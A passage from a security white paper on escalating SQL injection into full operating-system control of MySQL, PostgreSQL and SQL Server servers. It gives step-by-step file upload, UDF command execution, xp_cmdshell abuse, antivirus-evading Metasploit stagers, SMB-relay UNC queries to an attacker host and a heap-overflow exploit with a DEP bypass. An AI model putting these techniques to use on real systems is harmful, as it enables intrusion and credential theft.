The created file is always world-writable. On Linux and UNIX systems it is owned by the user that started the MySQL process (usually mysql),On Windows, MySQLruns by default as Local System,and the file will be world-readable by everyone.

The file can be written via either UNION query or batched query SQL injection technique. Nevertheless there are some limitations to be considered when using the UNION query technique:
•If the injection point is on a GET parameter, some web servers impose a limit on the length of the parameters’ request;
•It is not possible to append data to an existing file via INTO DUMPFILE clause.
However, these limitations can be bypassed if the web application supports batched queries with MySQL as the back-end DBMS: ASP.NET is one of these programming languages.

The steps are:
•On the attacker box:
Encode the local file content to its corresponding hexadecimal string;
Split the hexadecimal encoded string into chunks long 1024 characters each.
•Via batched queries:
Create a support table with one field, data-type longblob;
INSERT[49] the first chunk into the support table’s field;
UPDATE[50] the support table’s field by appending to the entry the chunks from the second to the last;
Export the hexadecimal encoded file content from the support table’s entry to the destination file path by using SELECT’s INTO DUMPFILE clause.
This is possible because on MySQL, a query like SELECT 0×41 returns the corresponding ASCII character A.
It is possible to check if the file has been correctly written by retrieving the LENGTH[47] value of the written file.

It should be noted that abusing UNION query SQL injection technique to upload files to the database server can also be done when the web application language is ASP and PHP as they do not support batched queries by default.

5.2 PostgreSQL
PostgreSQL has native functions[66] to deal with Large Objects[65]:lo_export() and lo_unlink().lo_create(),These functions have beende signed to store within the database large files or reference local files via pointers, called OID, that can be then copied to other files on the file system. However, it is possible to abuse these functions and successfully write text and binary files on the underlying file system via SQL injection, even though the source file is on the attacker machine.

The session user must be a “super user” to deal with Large Objects [65, 67].
On Linux and UNIX systems the created file has permissions set to 644 and it is owned by the user that started the PostgreSQL process (usually postgres).On Windows, PostgreSQL runs by default as postgres,so the file owner is postgres..

The file can only be written via batched queries SQL injection technique.
The steps are:
•On the attacker box:
Encode the local file content to its corresponding base64 string;
Split the base64 encoded string into chunks long 1024 characters each.
Via batched queries:
Create a support table with one field, data-type text;
INSERT[69] the first chunk into the support table’s field;
UPDATE[70] the support table’s field by appending to the entry the chunks from the second to the last;
Create a large object with a specific OID[66];
UPDATE[70] the pg_largeobject[67] system table entry corresponding to our OID by setting the data field value to the decoded[64] value of our support table’s field entry;
Export the data corresponding to our OID to the destination file path vialo_export().
Note that lo_export() exports only the first 8192 bytes from the pg_largeobject
table to the destination file, but this does not limit any of the attacks described later on this paper.

It is possible to check if the original file content has been correctly written to the
pg_largeobject table by retrieving the LENGTH[64] value of the table’s data field corresponding to our OID. This value corresponds to the same size of the written file if it is smaller than 8192 bytes.

5.3 Microsoft SQL Server

Microsoft SQL Server has a native extended procedure to run commands on the underlying operating system:xp_cmdshell()[34].This extended procedure can be abused to execute the echo command redirecting its text arguments to a file. Refer to the section 8.1.1 for further details on this extended procedure.
The session user must have CONTROL SERVER permission to call this extended procedure.
The created file is owned by the user that started the Microsoft SQL Server process and is world-readable.

The steps are:
•On the attacker box:
Split the file to upload in chunks of 65280 bytes (debug script file size limit)10;
Convert each chunk to its plain text debug script[3] format.
•Via batched queries:

For each plain text chunk’s debug script:
Execute the echo command via xp_cmdshell() to output the debug script to a temporary file all the lines;
Recreate the chunk from the uploaded debug script by calling the Windows debug executable via xp_cmdshell();
Remove the temporary debug script.
Assemble the chunks with Windows copy executable to recreate the original file;
Move the assembled file to the destination path.

It is possible to check if the file has been correctly written. The steps via batched queries are:
• Create a support table with one field, data-type text;
• Use BULK INSERT statement to load the content of the file as a single entry into the support table;
• Retrieve the DATALENGTH value of the support table’s first entry.
—————————
10 This technique was initially implemented by ToolCrypt Group on their dbgtool
—————————

Part III Operating system access

Arbitrary command execution on the back-end DBMS underlying operating system can be achieved with all of the three database softwares. The requirements are: high privileged session user and batched queries support on the web application 11 .
The techniques described in this chapter allow the execution of commands and the retrieval of their standard output via blind, UNION query or error based SQL injection technique: the command is executed via SQL injection and the standard output is also retrieved over HTTP protocol, this is an inband connection.

6 User-Defined Function

Wikipedia defines User-Defined Function (UDF) as follows:

“In SQL databases, a user-defined function provides a mechanism for extending the functionality of the database server by adding a function that can be evaluated in SQL statements. The SQL standard distinguishes between scalar and table functions. A scalar function returns only a single value (or NULL).
[...] User-defined functions in SQL are declared using the CREATE FUNCTION statement.”

On modern database management systems, it is possible to create functions from shared libraries
12 located on the file system.
These functions can then be called within the SELECT statement like any other built-in string function.
All of the three database management systems have a set of libraries and API 13 that can be used by developers to create user-defined functions.

On Linux and UNIX systems the shared library is a shared object[81] (SO) and can be compiled with GCC[13]. On Windows it is a dynamic-link library[80] (DLL) and can be compiled with Microsoft Visual C++[23].
In order to compile a shared library, it is necessary to have the specific DBMS development libraries installed on the operating system.
For instance, on recent versions of Debian GNU/Linux like systems to be able to compile a UDF for PostgreSQL you need to have installed the postgresql-server-dev-8.3 package.
With Windows, the development library path need to be added manually to the Microsoft Visual C++ project settings.
The next step is to place the shared library in a path where the DBMS looks for them when creating functions from shared libraries: where PostgreSQL allows the shared library to be placed in any readable/writable folder on either Windows or
Linux, MySQL needs the binary file to be placed in a specific location which varies
depending upon the particular software version and operating system.
——————————-
11 Only two on the nine possible combinations taken into account on table on page 6, do not support batched queries and consequently command execution is not possible via SQL injection: PHP with MySQL and ASP with MySQL.
12 Shared libraries are libraries that are loaded by programs when they start. When a shared library is installed properly, all programs that start afterwords automatically use the new shared library.
13 An application programming interface (API) is a set of routines, data structures, object classes and/or protocols provided by libraries and/or operating system services in order to support the building of applications.
——————————-

7 UDF injection

Attackers have so far under-estimated the potential of using UDF to control the underlying operating system. Yet, this over-looked area of database security potentially provides routes to achieve command execution.

By exploiting a SQL injection flaw it is possible to upload a shared library which contains two user-defined functions:
• sys_eval(cmd)- executes an arbitrary command, and returns it’s standard output;
• sys_exec(cmd)- executes an arbitrary command, and returns it’s exit code.

After uploading the binary file on a path where the back-end DBMS looks for shared libraries, the attacker can create the two user-defined functions from it: this would be UDF injection. Now, the attacker can call either of the two functions: if the command is executed via sys_exe(),it is executed via batched queries technique and no output is returned. Otherwise, if it is executed via sys_eval(),a support table is created, the command is run once and its standard output is inserted into the table and either the blind algorithm, the UNION query or the error based technique can be used to retrieve it by dumping the support table’s first entry; after the dump, the entry is deleted and the support table is clean to be used again.

7.1 MySQL
7.1.1 Shared library creation
On MySQL, it is possible to create a shared library that defines a user-defined function to execute commands on the underlying operating system. Marco Ivaldi demonstrated, some years ago, that his shared library[20] defined a UDF to execute a command. However, it is clear to me, that this has two limitations:
• It is not MySQL 5.0+ compliant because it does not follow the new guidelines to create a proper UDF;•
• It calls C system() function to execute the command and returns always integer 0.
This expression of UDF is almost useless on new MySQL server versions because if an attacker wants to get the exit status or the standard output of the command he can not.

In fact, I have found that it is possible to use UDF to execute commands and retrieve their standard output via SQL injection.
I firstly focus my attention on the UDF Repository for MySQL and patched one of their codes: lib_mysqludf_sy [79] by adding the sys_eval() function to execute arbitrary commands and returns the command standard output.This code iscompatible with both Linux and Windows.
The patched source code is available on sqlmap subversion repository[5].
The sys_exec() function can be used to execute arbitrary commands and has two advantages over Marco Ivaldi’s shared library:
• It is MySQL 5.0+ compliant and it compiles on both Linux as a shared object and on Windows as a dynamic-link library;
• It returns the exit status of the executed command.
A guide to create a MySQL compliant user-defined function in C can be found on the MySQL reference manual[41]. I found also useful Roland Bouman’s step by step blog post[75] on how to compile the shared library on Windows with Microsoft Visual C++.
The shared library size on Windows is 9216 bytes and on Linux it is 12896 bytes.
The smaller the shared library is, the quicker it is uploaded via SQL injection. To make it as small as possible the attacker can compile it with the optimization setting enabled and, once compiled, it is possible to reduce the dynamic-link library size by using a portable executable packer like UPX[17] on Windows.The shared object size can be reduced by discarding all symbols with strip command on Linux. The resulting binary file size on Windows is 6656 bytes and on Linux it is 5476 bytes: respectively 27.8% and 57.54% less than the initial compiled shared library.

It is interesting to note that a MySQL shared library compiled with MySQL 6.0 development libraries is backward compatible with all the other MySQL versions, so by compiling one, that same binary file can be reused on any MySQL server version on the same architecture and operating system.

7.1.2 SQL injection to command execution
The session user must have the following privileges: FILE and INSERT on mysql database, write access on one of the shared library paths and the privileges needed to write a file, refer to section 5.1.
The steps are:

•Via blind or UNION query are:

Fingerprint the MySQL version for two reasons:

Choose the SQL statement to test for batched queries support as explained on section 3.1;

Identify a valid shared libraries absolute file path as explained in the next paragraph.
Check if sys_exec() and sys_eval() functions already exist to avoid unwanted data overwriting.
• Test for batched queries support;
• Via batched queries:
• Upload the shared library to an absolute file system path where the MySQL server looks for them as described below;
• Create[51] the two user-defined functions from the shared library;
• Execute the arbitrary command via either sys_exec() or sys_eval().
Depending on the MySQL version, the shared library must be placed in different file system paths:

• On MySQL 4.1 versions below4.1.25, MySQL 5.0 versions below 5.0.67 and MySQL 5.1 versions below 5.1.19 the shared library must be located in a directory that is searched by your system’s dynamic linker:

•on Windows the shared object can be uploaded to either C:\WINDOWS, C:\WINDOWS\system, C:\WINDOWS\system32, @@basedir\bin or to @@datadir14 . On Linux and UNIX systems the dynamic-link library can be placed on either /lib, /usr/lib or any of the paths specified in /etc/ld.so.conf file 15;

•MySQL 5.1 version 5.1.19[39] enforced the expected behavior of the system variable plugin_dir[40] which specifies one absolute file system path where the shared library must be located16 . The same applies for all versions of MySQL 6.0[52].
From MySQL 5.1[51] and MySQL 6.0[52] manuals:
CREATE [AGGREGATE] FUNCTION function_name RETURNSn{STRING|INTEGER|REAL|DECIMAL} SONAME shared_library_name
[...]shared_library_name is the basename of the shared object file that contains the code that implements the function.The file must be located in the plugin directory. This directory is given by the value of the plugin_dir system variable .

•MySQL 4.1 version 4.1.25[35] and MySQL 5.0 version 5.0.67[38] also introduced the system variable plugin_dir:
by default it is empty and the same behavior of previous MySQL versions is applied.
From MySQL 5.0 manual[37]:
[...] As of MySQL 5.0.67, the file must be located in the plugin diplugin_dir rectory. This directory is given by the value of the system variable. If the value of plugin_dir is empty, the behavior that is used before 5.0.67 applies: The file must be located in a directory that is searched by your system’s dynamic linker .

———————————
14 On Windows, MySQL runs as Local System (SYSTEM) user which by default is high privileged and can read and write files to all of the valid shared library paths.
15 On recent versions of Linux and UNIX systems, MySQL runs as mysql user. By default none of the valid shared library paths are writable by this user.
16 By default this variable value is set to /lib/plugin and the plugin/subfolder does not exist: the server administrator must have previously created it, otherwise the attacker will not be able to upload the binary file in such folder and consequently no command execution will be possible.
———————————

7.2 PostgreSQL
7.2.1 Shared library creation
On PostgreSQL, arbitrary command execution can be achieved in three ways:
• Taking advantage of libc built-in system() function: Nico Leidecker described this technique in his paper Having Fun With PostgreSQL[55, 56];
• Creating a proper Procedural Language Function[71]: Daniele Bellucci described[59] the steps to go through to do that by using PL/Perl and PL/Python languages;
• Creating a C-Language Function[72] (UDF): David Litchfield described this technique in his book The Database Hacker’s Handbook, chapter 25 titled PostgreSQL: Discovery and Attack. The sample code is freely available from the book homepage[11].

All of these methods have at least one limitation that make them useless on recent PostgreSQL server installations:
•
The first method only works until PostgreSQL version 8.1 and returns the command exit status, not the command standard output. Since PostgreSQL version 8.2-devel all shared libraries must include a magic block.
From PostgreSQL 8.3 manual[72]:
“A magic block is required as of PostgreSQL 8.2.To include a magic block, write this in one (and only one) of the module source files, after having included the headerfmgr.h :
#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif
The #ifdef test can be omitted if the code doesn’t need to compile against pre-8.2 PostgreSQL releases.”

• The second method only works if PostgreSQL server has been compiled with support for one of the procedural languages. By default they are not available, at least on most Linux distributions and Windows;
• The third method works until PostgreSQL version 8.1 for the same reason of the first method and it has the same behavior: no command standard output.
Anyway, it can be patched to include the magic block and make it work properly; also on PostgreSQL versions above 8.1.

I ported the C source code of the MySQL shared library described above to PostgreSQL and created a shared library called lib_postgresqludf_sys with two C Language Function. The source code is available on sqlmap subversion repository[5].
The shared library size on Windows is 8192 bytes and on Linux it is 8567 bytes.
The smallest the shared library is, the quickest it is uploaded via SQL injection. To make it as small as possible the attacker can compile it with the optimization setting enabled and, once compiled, it is possible to reduce the dynamic-link library size by using a portable executable packer like UPC[17] on Windows and the shared object size by discarding all symbols with strip command on Linux. The resulting binary file size on Windows is 6144 bytes and on Linux it is 5476 bytes: respectively 25% and 36.1% less than the initial compiled shared library. The shared library compiled with PostgreSQL 8.3 development libraries is not backward compatible with any other PostgreSQL version: the shared library must be compiled with the same PostgreSQL development libraries version where you want to use it. 7.2.2 SQL injection to command execution The session user must be a super user.
The steps are:
• Via blind or UNION query:
• Fingerprint the PostgreSQL version in order to choose the SQL statement to test for batched queries support as explained on section 3.2;
• Check if sys_exec() and sys_eval() functions already exist to avoid unwanted data overwriting.
• Test for batched queries support;
• Via batched queries:
Upload the shared library to an absolute file system path where the user running PostgreSQL has read and write access17 , this can be /tmp on Linux and UNIX systems and C:\WINDOWS\Temp on Windows;
• Create[68] the two user-defined functions from the shared library18 ;
• Execute the arbitrary command via either sys_exec() or sys_eval().
It is interesting to note that PostgreSQL is more flexible than MySQL and allows to
specify the absolute path where the shared library is.
——————————
17 On both Linux and Windows, PostgreSQL runs the unprivileged user postgresql.
18 On Windows the postgres user has read and write access on path>/data. The shared library can be created in this path by not specifying any path when
using lo_export() as explained in section 5.2. That said, when the UDF is created from the
shared library, the absolute path can be omitted.
——————————

8 Stored procedure

Wikipedia defines Stored Procedure as follows:
“A stored procedure is a subroutine available to applications accessing a relational database system. Stored procedures are actually stored in the database data dictionary.
[...] Stored procedures are similar to user-defined functions. The major difference is that UDFs can be used like any other expression within SQL statements, whereas stored procedures must be invoked using the CALL statement or EXECUTE statement.”

On modern database management system it is possible to create stored procedures to execute complex tasks. Some DBMS have also built-in procedures, Microsoft SQL Server and Oracle for instance. Usually stored procedures make deep use of the DBMS specific dialect: respectively Transact-SQL and PL/SQL.

8.1 Microsoft SQL Server
8.1.1 xp_cmdshell procedure
Microsoft SQL Server has a built-in extended stored procedure to execute commands and return their standard output on the underlying operating system: xp_cmdshell()[29,30, 31].
This stored procedure is enabled by default on Microsoft SQL Server 2000, whereas on Microsoft SQL Server 2005 and 2008 it exists but it is disabled by default: it can be re-enabled by the attacker remotely if the session user is a member of the sysadmin server role.On Microsoft SQL Server 2000, the sp_addextendedproc stored procedure can be used whereas on Microsoft SQL Server 2005 and 2008, the sp_configure stored procedure can be used.
If the procedure re-enabling fails, the attacker can create a new procedure from scratch using shell object if the session user has the required privileges. This technique has been illustrated numerous times and can be still used if the session user is high privileged[2].
On all Microsoft SQL Server versions, this procedure can be executed only by users with the sysadmin server role. On Microsoft SQL Server 2005 and 2008 also users specified as proxy account can run this procedure.

8.1.2 SQL injection to command execution

The session user must have CONTROL SERVER permission.

The first thing to do is to check if xp_cmdshell() extended procedure exists and is enabled: re-enable it if it is disabled and create it from scratch if the creation fails.
If the attacker wants the command standard output:
• Create a support table with one field, data-type text;
• Execute the command via xp_cmdshell() procedure redirecting its standard output to a temporary file;

• Use BULK INSERT statement to load the content of the temporary file as a single entry into the support table;
• Remove the temporary file via xp_cmdshell();
• Retrieve the content of the support table’s entry;
• Delete the content of support table.
Otherwise:
• Execute the command via xp_cmdshell()

Part IV Out-of-band connection
In the previous chapter I discussed two techniques to execute commands on the underlying operating system: UDF injection and stored procedure use.
In this chapter I discuss how to establish an out-of-band connection between the attacker host and the database server by exploiting a SQL injection flaw in a web application. Once the attack is successful, a command prompt or a graphical user interface full-duplex TCP connection is established between the two endpoints.

This is possible in practice by integrating the Metasploit Framework[76] in sqlmap[4]
and requires both back-end DBMS underlying file system access and inband command execution, both explained previously.

From the Metasploit project site:

“The Metasploit Framework is a development platform for creating security tools and exploits. [...] The framework consists of tools, libraries,modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload.”

9 Stand-alone payload stager
An out-of-band connection between the attacker and the database server can be achieved by forging a stand-alone payload 19 stager20 , based on the user’s options with Metasploit’s
msfpayload tool. Then it is necessary to encode 21 it with Metasploit’s msfencode tool, to bypass antivirus softwares, upload it via SQL injection to the file system temporary folder and execute it.

Depending on the user’s options, the stager will bind and listen on a TCP port on the database server waiting for an incoming connection or it will connect back to a TCP port on the attacker host.Either bind or reverse connection, Metasploit’s msfcli22 tool has to be executed on the attacker host before the payload stager is executed on the database server: the Metasploit’s multi-handler exploit 23 exploits/multi/handler.rb[78],is used on the attacker endpoint.
————————————
19 The payload is the arbitrary code (shellcode) that is executed on the target system after a successful exploit attempt or after the execution of the stager. Payloads can be either command strings or raw instructions. They typically build a communication channel between Metasploit and the target host.
20 A stager payload is an implementation of a payload that establishes some communication channel with the attacker to read in or otherwise obtain a second stage payload to execute. For example, a stager might connection back to the attacker on a defined port and read in code to execute.
21 An encoder is used to generate transformed versions of raw payloads in a way that allows them to be restored to their original form at execution time and then subsequently executed.
22 msfcli is the Metasploit Command Line Interface. This interface takes a Metasploit module name as the first parameter, followed by the options in a VAR=VAL format, and finally an action code to specify what should be done.
————————————

9.1 Payload stager options
Metasploit has numerous payloads for several operating systems and architectures.sqlmap asks the attacker for:
• Connection type, it can be bind or reverse:
• Back-end DBMS server address if different from the web server address in case of bind connection.
• TCP port to listen on the attacker host in case of reverse connection or on the
database server in case of bind connection;
• Multistage payload to use among:
shell 24 if the back-end DBMS underlying operating system is either Windows or Linux;
meterpreter 25 if the back-end DBMS underlying operating system is Windows[21];
vnc 26 if the back-end DBMS underlying operating system.
• Algorithm to encode the payload: at the time of writing Metasploit supports twelve different encoders.
Based on the user’s options, sqlmap creates the payload stager, encodes it and packs it with UPX[17]: an executable payload originally 9728 bytes is resized to 2560 bytes and consequently quicker to upload via SQL injection. The payload executables generated by Metasploit Framework 3 automatically handles and bypasses operating system memory protections:
• The ELF payload stager for Linux has the shellcode that resides in a memory zone already marked as executable so that no memory protection bypass is needed;
• On Windows, the Data Execution Prevention, described on paragraph 11.2, is bypassed by allocating the memory page as readable, writable and executable before copying the shellcode on it and executing it.This is defined on the Metasploit’s template file used to generate the portable executable payload stager.
———————————-
23 The multi/handler exploit is a stub that provides all of the features of the Metasploit payload system to exploits or stand-alone payload stagers that have been launched outside of the Metasploit Framework.
24 The shell payload spawns a piped command shell, on Linux usually it is bash and on Windows it is the command prompt cmd.
25 The Meterpreter is an advanced multi-function payload that can be dynamically extended at run-time. In normal terms, this means that it provides you with a basic shell and allows you to add new features to it as needed.
26 The VNC server payload allows the attacker to access the desktop of the database server if the Administrator is logged in.
———————————-

9.2 Session
After the payload stager is created, it is uploaded, as explained on page 10, via batched queries SQL injection technique to an absolute file system path on the database server where the user running the back-end DBMS process has read and write access:
/tmp on Linux and UNIX systems and C:\WINDOWS\Temp on Windows.
The payload stager upload requires six HTTP requests on Microsoft SQL Server,nine on MySQL and twelve on PostgreSQL.

At this point Metasploit’s msfcli tool is executed on the attacker host using the multihandler exploit with the user’s options provided to create the payload stager: this requires some time because msfcli tool loads in memory all the Metasploit modules.
The payload stager is then executed on the database server via sys_exec() function on MySQL and PostgreSQL or via xp_cmdshell() onMicrosoft SQL Server and the full-duplex out-of-band connection is established.

The control of the connection is now passed to the multi-handler exploit which,depending on the payload chosen, sends the intermediate stager and the DLL (for Meterpreter and VNC) to the database server endpoint before initializing the session.
Over this connection, the attacker interacts with the database server underlying operating system, being it a terminal, a Meterpreter console or a VNC graphical user interface.
It is important to note that the payload stager is executed on the database server with the privileges of the user running the back-end DBMS server process.However, under certain circumstances on Windows, it is possible to perform a privilege escalation to SYSTEM
as explained on page 32.

10 SMB relay attack

The SMB authentication relay attack was researched in 1996 by Dominique Brezinski and explained in his paper titled A Weakness inCIFS Authentication [12] presented at Black Hat USA 1997.
The first public tool to implement this attack, SMBRelay2[18], was released by Josh Buchbinder during @tlanta convention on March 31,2001.
This vulnerability allows an attacker to redirect an incoming SMB connection back to the machine it came from and then access the victim machine using the victim’s own credentials, this attack is also known as SMB credential reflection.
H D Moore well explained on Metasploit blog[15] how the exploit works:
“The Metasploit module takes over the established, authenticated SMB session, disconnects the client, and uses the session to upload and execute shellcode in a manner similar to how psexec.exe operates. First, a Windows executable is created that acts like a valid Windows service and executes the specified Metasploit payload. This payload is then uploaded to the root of the ADMIN$ share of the victim. Once the payload has been uploaded, the Service Control Manager is accessed over DCERPC (using a named pipe over SMB) and used to create a new service (pointing at the uploaded executable) and then start it.This service creates a new suspended process, injects the shellcode into it, resumes the process, and shuts itself down. The module then deletes the created service. At this point, the attacker has a remote shell (or other payload session) on the victim.”

It is unlikely that this attack will be successful over the Internet because usually firewalls filter incoming connections on SMB specific ports: 139/TCP and 445/TCP,but within local area networks they usually do not. Other requirements for the SMB reflection attack to be successful are that the victim’s user must have administrative privileges and that the system must be configured to allow remote network logins.
On November 11, 2008, twelve years after the vulnerability was publicly disclosed,Microsoft released security bulletin MS08-068[24] (CVE-2008-4037).This bulletin includes a patch which prevents the relaying of challenge keys back to the same host which issued them: if a Windows server has this patch applied, the exploitation of this flaw does not work.

10.1 Universal Naming Convention

The Universal Naming Convention (UNC) specifies a common syntax to describe the location of a network resource, such as a shared file, directory, or printer.
An example of UNC path for Windows systems is as follows:
\\AttackerAddress\ExamplePath\Filename.txt
This syntax allows a Windows client to access the path \ExamplePath\Filename.txt on the AttackerAddress via SMB.

If AttackerAddress denies access to anonymous user (NULL session), the client automatically authenticates using the username of the logged-in user, domain, and his hashed password encrypted with the server-supplied challenge key.

10.2 Abuse UNC path requests
The UNC path request syntax can be abused to perform a SMB relay attack via SQL injection if the underlying operating system is Windows.
By executing Metasploit’s SMB relay exploit, exploits/windows/smb/smb_relay.rb[77],on the attacker host and forcing the database server to access the attacker’s fake SMB service, it can be possible to exploit the design flaw by performing the SMB reflection
attack.
Also with this exploit, the attacker has a variety of options to choose to forge the
payload, but in this case the payload will be sent directly from the SMB relay exploit
after a successful exploitation of the SMB design flaw.
10.2.1 MySQL
On MySQL it is possible to request a resource and initiate a SMB session via UNC
path request through either batched query or UNION query SQL injection.
The SQL statement is as follows:
SELECT LOAD_FILE(‘\\\\AttackerAddress\\foobar.txt’)
The session user must have the FILE privilege.

However it is unlikely that this attack will be successful because by default MySQL on Windows runs as Local System which is not a real user, it does not send the
NTLM session hash when connecting to a SMB service.If MySQL database is started as Administrator, this attack can be successful.

10.2.2 PostgreSQL

The SQL statements to perform a reverse UNC path request to the attacker host via batched queries SQL injection is as follows:
CREATE TABLE footable(foocolumn text);
COPY footable(foocolumn) FROM ‘\\\\AttackerAddress\\foobar.txt’
The session user must be a super user.
However it is unlikely that this attack will be successful because by default PostgreSQL on Windows runs as postgres user which is a real user of the system, but not within the Administrators group.

10.2.3 Microsoft SQL Server

A possible SQL statement to perform a reverse UNC path request to the attacker host via batched queries SQL injection is as follows:
EXEC master..xp_dirtree ‘\\AttackerAddress\foobar.txt’
The session user needs to have EXECUTE privileges on the extended stored procedure, which all database users have by default.
By default Microsoft SQL Server 2000 runs as Administrator, consequently this attack shall be successful whereas on Microsoft SQL Server 2005 and 2008 it is unlikely that this attack will be successful because it runs usually as Network Service which is not a real user, it does not send the NTLM session hash when connecting to a SMB service.

11 Stored procedure buffer overflow

On December 4, 2008, Bernhard Mueller from SEC Consult Vulnerability Lab released an advisory titled Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability [6].
It is an heap-based buffer overflow on Microsoft SQL Server 2000 Service Pack 4 and earlier patch levels and Microsoft SQL Server 2005 Service Pack 2 and earlier patch levels. A successful exploitation of this security flaw allows an authenticated database users to cause a denial of service (Access Violation Exception) or to execute arbitrary code on the underlying operating system.
It is possible to exploit this vulnerability by calling the vulnerable Microsoft SQL Server stored procedure,sp_replwritetovarbin,with a set of invalid parameters that trigger a memory overwrite condition to a location controlled by the attacker.

At the time of writing this paper, no public exploit is available for this vulnerability except for a proof of concept[14] released by Guido Landi that exploits the vulnerability specifically on Microsoft SQL Server 2000 running on Windows 2000Service Pack 4.
Two commercial exploits are available on two different commercial exploitation frameworks: on Immunity Canvas[16], the exploit is a one-shot only exploit and it seems to be written to work only through a direct connection to the database server and on Core Impact[10].
One interesting thing about this heap-based buffer overflow vulnerability is that it is possible to trigger the bug through a SQL injection also, moreover the session user does not need any administrative access on the DBMS: he needs to have EXECUTE privilege on the extended stored procedure, which all database users have by default.
On February 10, 2009 Microsoft released security bulletin MS09-004[25] (CVE-2008-5416). This bulletin addresses this security flaw: if a Windows server has this patch applied, the exploitation of this issue does not work.

11.1 Exploit

Guido Landi decided to release a reliable stand-alone exploit for this vulnerability with the publication of this white paper. I added support to the exploit for multimsfpayload stage payload generated by Metasploit’s and integrated it in sqlmap[4] to be able to exploit the vulnerability also via SQL injection.
Guido also explains his exploit as follows.
It could be pretty hard to achieve arbitrary code execution through heap-based buffer overflow vulnerabilities if the attacker intent is to exploit the system routines that manage the heap memory. Nevertheless, in this exploit we are going to use the buffer overflow to overwrite a function pointer thus achieving arbitrary code execution.
When the vulnerable stored procedure is called with a set of invalid parameters a first exception is raised by the processor:
MOV DWORD PTR DS:[EAX+4],EDI
Both the EAX and the EDI registers are attacker-controlled: the former comes directly from our buffer, the latter is related to the buffer length. Even if this is an (almost) arbitrary memory overwrite, it could be hard to use this to achieve code execution. Actually this exception and the others that follow will be handled fairly by the Microsoft SQL Server process through the installed Windows Structured Exception Handling (SEH) mechanism. That allows us to simply skip some exceptions until we found one that will bring we to divert the execution flow.
After a sequence of exceptions the program reaches the following code:

010B0F5A . 8B42 10 MOV EAX,DWORD PTR DS:[EDX+10]
010B0F5D FFD0 CALL EAX

The memory pointed by EDX+0×10 will be deferenced and moved to EAX then EAX will be called. Since the EDX register comes directly from our buffer, we can redirect the execution flow toward an arbitrary location, actually we will use this instruction to achieve code execution.
The first problem to solve is the value we want EDX to hold: since ESI and ECX registers point to our buffer where we reach that code, we want one of those being called. To do so we need to find a fixed address that holds another fixed address that points to a series of instructions that will redirect the execution flow to our buffer, some useful instructions could be:
“call ESI”
“call ECX”
“push ESI” and “RET”
“push ECX” and “RET”

The second problem is that both ECX and EDI registers point to our buffer where the address we want to be in EDX lies. We must be sure that this address can be interpreted as a series of instructions without raising any exception, otherwise the process will crash and our shellcode will not be executed.
The third problem is related to the repeatability of the exploit, we want it to be multiple shot, consequently allowing the attacker to launch it multiple times without crashing the Microsoft SQL Server process.
Finding the right return address is often a matter of time and requires to look up some DLLs for the instructions we need: either manually with a debugger or with the Metasploit’s msfpescan 27 tool. Often it is a good idea to search for the return address in an executable module included by the program itself, but in this case due to the fact that different versions of the Microsoft SQL server exist, you better use an address contained in one system’s DLL. It is not that easy because of the level of indirection brought by the MOV instruction that deference the EDX pointer. We can use a little script with msfpescan that first search for the instruction we need and then for an address that holds a pointer to the instructions found:

———————————–
27 Metasploit’s msfpescan can be used to analyze and disassemble executables and DLLs, which helps to find the correct offsets and addresses during the stage of exploitation and privilege escalation.
———————————–

for i in $(./msfpescan -j ESI,ECX shell32.dll | grep 0x | sed -e ‘s/0x//’ | awk ‘{print $1}’ | perl -e ‘while(<>) { chop; @a=($_=~/.{2}/gm); print “\\x”,join(“\\x”,reverse(@a)), “\n”; }’); do ./msfpescan r “$i” shell32.dll | grep 0x ; done

This will search the instructions needed to “land” in our buffer in shell32.dll and a pointer to one of those instructions in shell32.dll.It is also possible to specify different DLL. This was done for the return address used to target Windows 2003 Service Pack 2: the instructions lie in kernel32.dll and we found a pointer to them in ntdll.dll.

Since the address must also be interpreted and executed as a set of assembly instructions, we must check if those instructions can be executed without crashing the program. The third address for instance is fine for us because interpreted as instructions turns out to be:

DCE1 FSUBR ST(1),ST
F8 CLC
7C 01 JL 0×1

These instructions will be executed and will bring us to our shellcode.
The second problem, repeatability, it is solved by appending at the end of our shellcode a little stub of instructions that will restore the stack to the original state using some “POP” instructions and will then return exactly where we diverted the execution flow with a “RET” instruction. Further exceptions will be handled by the SEH mechanism installed by the program and the Microsoft SQL Server process will continue to run correctly.

11.2 Memory protection

Data Execution Prevention (DEP) is a security feature that prevents code execution in memory pages not marked as executable
From Microsoft Help and Support site[26]:
“DEP configuration for the system is controlled through switches in the boot.ini file. If you are logged on as an administrator, you can now easily configure DEP settings by using the System dialog box in Control Panel.
Windows supports four system-wide configurations for both hardware-enforced and software-enforced DEP.”
Data Execution Prevention possible settings are:
• OptIn:only Windows system binaries are covered by DEP by default;
• OptOut:DEP is enabled by default for all processes, exceptions are allowed;
• AlwaysOn: all processes always run with DEP applied, no exceptions allowed;
• AlwaysOff : no DEP coverage for any part of the system.

Data Execution Prevention exists from the following Windows service packs:

• Windows XP Service Pack 2: default value is OptIn;
• Windows Server 2003 Service Pack 1: default value is OptOut[28];
• Windows Vista Service Pack 0: default value is OptIn;
• Windows 2008 Service Pack 0: default value is OptOut.

Note that it does not exist on Windows 2000 and on any previous Windows version.

11.3 Bypass DEP

Over the years different methods to bypass this security mechanism have been developed and publicly released. Actually they are all based on the possibility to control at least some pointers on the stack and to chain at least two function calls after the vulnerability has been triggered.
The first, or the first set, of function calls are used to disable DEP for the current process or to mark a specific memory page as executable using VirtualProtect /VirtualAlloc or to copy the shellcode to a memory page already marked as executable, the second call is the one that will redirect the execution flow to the injected shellcode.
The vulnerability in exam, MS09-004, is an heap-based buffer overflow that does not permit to directly control data on the stack and so it seems not possible to chain multiple calls together. Even if we could use some execution paths, this could lead to almost arbitrary overwrites to create fake stack frames, being the Microsoft SQL Server stack highly unstable, that possibility seems to be only theoretical.If DEP is set to OptOut or to AlwaysOn,the exploit will fail because the process will raise an access violation exception when it tries to execute code from the non executable memory space where the shellcode resides.
A possible way to get around Data Execution Prevention when it is set to OptOut,via SQL injection, is to add an exception for the Microsoft SQL Server executable,sqlservr.exe, in the Windows registry then restart the database process and launchthe exploit.
The steps are:

Create a bat file which executes the Windows reg executable to add in the Windows registry an exception for Microsoft SQL Server executable, sqlservr.exe:

